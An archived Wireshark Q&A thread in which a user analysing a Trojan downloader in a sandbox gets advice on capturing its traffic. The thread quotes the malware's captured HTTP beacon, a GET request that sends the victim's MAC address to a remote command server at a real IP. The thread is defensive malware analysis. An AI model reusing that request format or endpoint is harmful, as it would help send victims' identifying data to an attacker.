This is our old Q&A Site. Please post any new questions and answers at ask.wireshark.org.

hello I examined a Trojan downloader and I found that it sends the Local MAC address to a remote computer. can you please help me to understand the process using wireshark. BTW I use IDA Pro.

asked 03 Feb '13, 12:26

Mimou%20Fares's gravatar image

Mimou Fares
11113
accept rate: 0%


Have you captured the traffic of the computer that has the trojan? That would be the first step - and please, don't do it ON the infected computer. Forensic captures are best taken by using a network TAP and another computer running a capture software like Wireshark/dumpcap. If you don't have a TAP you can try capturing via SPAN port.

When you have a trace you could post it at www.cloudshark.org and post the URL. That way we can take a look at what you've got.

permanent link

answered 03 Feb '13, 14:49

Jasper's gravatar image

Jasper ♦♦
23.8k551284
accept rate: 18%

thank you for your answer. to capture the traffic I used Wireshark within the infected machine (virtual) and INetSim in the host. I had the following HTTP quire

GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1 User-Agent: wget 3.0 Host: 64.247.39.247 Cache-Control: no-cache

(03 Feb '13, 15:15) Mimou Fares

it seems also that Trojan sends the user name! where can I find such relevant information? thank you

(03 Feb '13, 15:21) Mimou Fares

well, basically you'll have to look through the trace you have and try to find any data transmitted that shouldn't be. POST or GET requests usually carry form data and parameters, so you should look at these. GET parameters are found in the URL, while POST parameters can be found at the bottom (line-base text data).

(03 Feb '13, 17:04) Jasper ♦♦

GET /confirm.php?aid=0&said=0&mac=08:xx:27:xx:DC:83&mn=1489 HTTP/1.1 User-Agent: wget 3.0 Host: 64.247.39.247 Cache-Control: no-cache

yes, looks like a Trojan, at least SonicWall and McAfee say so (same IP address used: 64.247.39.247)

http://software.sonicwall.com/applications/gav/index.asp?ev=v&v_id=26287
http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=148862 (see Characteristics)

Regards
Kurt

permanent link

answered 06 Feb '13, 12:52

Kurt%20Knochner's gravatar image

Kurt Knochner ♦
24.8k1039237
accept rate: 15%

edited 06 Feb '13, 12:55

Your answer
toggle preview

Follow this question

By Email:

Once you sign in you will be able to subscribe for any updates here

By RSS:

Answers

Answers and Comments

Markdown Basics

  • *italic* or _italic_
  • **bold** or __bold__
  • link:[text](http://url.com/ "title")
  • image?![alt text](/path/img.jpg "title")
  • numbered list: 1. Foo 2. Bar
  • to add a line break simply add two spaces to where you would like the new line to be.
  • basic HTML tags are also supported

Question tags:

×157
×6
×1
×1

question asked: 03 Feb '13, 12:26

question was seen: 2,491 times

last updated: 06 Feb '13, 12:55

p​o​w​e​r​e​d by O​S​Q​A